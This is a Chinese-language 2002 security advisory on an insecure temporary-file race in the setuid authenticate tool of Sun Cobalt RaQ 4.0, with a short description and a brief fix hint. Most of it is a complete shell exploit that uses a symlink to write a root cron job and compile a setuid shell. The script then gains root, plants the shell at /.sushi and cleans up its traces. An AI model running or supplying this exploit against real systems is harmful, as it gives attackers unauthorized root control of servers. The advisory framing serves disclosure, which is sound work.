Sun Cobalt RaQ临时文件建立不安全问题发布时间:2002-08-29 更新时间:2002-08-29 严重程度:高 威胁程度:权限提升 错误类型:竞争条件 利用方式:服务器模式 BUGTRAQ ID:5529 受影响系统 Cobalt RaQ 4.0详细描述 Cobalt RaQ是由SUN公司开发的WEB服务器。 Cobalt RaQ存在问题允许攻击者提升权限。漏洞存在于/usr/lib/authenticate工具中,这个工具由APACHE来调用用于验证目的。此工具在建立临时文件的时候采用了可预测的文件名,建立的文件而且是全局可写权限,攻击者可以通过符号连接连接到系统重要文件,修改重要文件为全局可读而提升权限。 测试代码 #!/bin/sh # # Cobalt Linux 6.0 Local Root Exploit # # Effects: <= apache-1.3.20-RaQ4_1C3 (AFAIK all Cobalt Linux Apache ;) # Quick Fix: su - root -c "chmod 755 /usr/lib/authenticate" # # Problem Source Code: # fd = open("gmon.out", O_WRONLY|O_CREAT|O_TRUNC, 0666); # # Suggested Code: # fd = mkstemp("/tmp/gmon.out-XXXXXX"); # # Still need help Cobalt developers? Ok: # man 3 tmpfile; man 2 open; echo "Thanks core" # # by Charles Stevenson <core@bokeoa.com> # # Fri Jun 28 03:35:53 MDT 2002 # - initial version # Sun Jul 7 20:12:41 MDT 2002 # - added some features for robustness echo "RaQFuCK.sh by core" target="/usr/lib/authenticate" tempdir="/tmp" if [ -u /.sushi ] ; then exec /.sushi fi printf "Checking for $target..." if [ -f "$target" ] ; then echo "done." else echo "NO!" exit 1 fi printf "Checking if $target is setuid root..." if [ -u "$target" ] ; then echo "done." else echo "NO! Hrm... does this admin have a clue???" exit 1 fi if [ ! -d "$tempdir/core" ]; then printf "Creating $tempdir/core..." if ! mkdir "$tempdir/core" 2>/dev/null ; then echo "FAILED!" ; exit 1 fi echo "done." fi printf "Changing directory to $tempdir/core..." if ! cd "$tempdir/core" 2>/dev/null ; then echo "FAILED!" ; exit 1 else echo "done." fi printf "Creating cron.d symlink..." if ! ln -fs /etc/cron.d/core gmon.out 2>/dev/null; then echo "FAILED!" ; exit 1 else echo "done." fi printf "Changing umask..." if ! umask 000 ; then echo "FAILED!" ; exit 1 else echo "done." fi printf "Compiling root shell..." cat >sushi.c <<EOF #include <unistd.h> int main (int argc, char **argv, char **envp) { setuid(0); setgid(0); execve("/bin/sh",argv,envp); return -1; } EOF if ! cc sushi.c -o sushi 2>/dev/null; then echo "FAILED!" ; exit 1 else echo "done." fi printf "Compiling cron takeover..." cat >takeover.c <<EOF #include <stdlib.h> main() { system("cp $tempdir/core/sushi /.sushi ; chmod 6777 /.sushi"); } EOF if ! cc takeover.c -o own 2>/dev/null; then echo "FAILED!" ; exit 1 fi echo "done." printf "Performing symlink attack..." printf "\n\n\n\n" | "$target" if [ -u /etc/cron.d/core ] ; then echo "SYMLINK ATTACK FAILED!" && exit 1 else echo "done." fi printf "Setting up evil cron job..." cat >croncore <<EOF */1 * * * * root if [ -x "$tempdir/core/own" ] ; then "$tempdir/core/own"; fi EOF if ! cat croncore 2>/dev/null >/etc/cron.d/core; then echo "FAILED!" ; exit 1 else echo "done." fi printf "Waiting for root shell" while [ ! -u /.sushi ] ; do sleep 1 ; printf "." done echo "done." cd / printf "Cleaning up real quick..." if ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/core"; then echo "FAILED??? Fuck it!" else echo "done." fi echo "Spawning root shell!!! God Damn! I say GOD DAMN!!" if ! exec /.sushi -i; then echo "Exec Failed!!! BUMMER!" ; exit 1 fi chmod a-s /usr/lib/authenticate" 解决方案 无 相关信息 参考:http://www.sun.com/hardware/serverappliances/ |
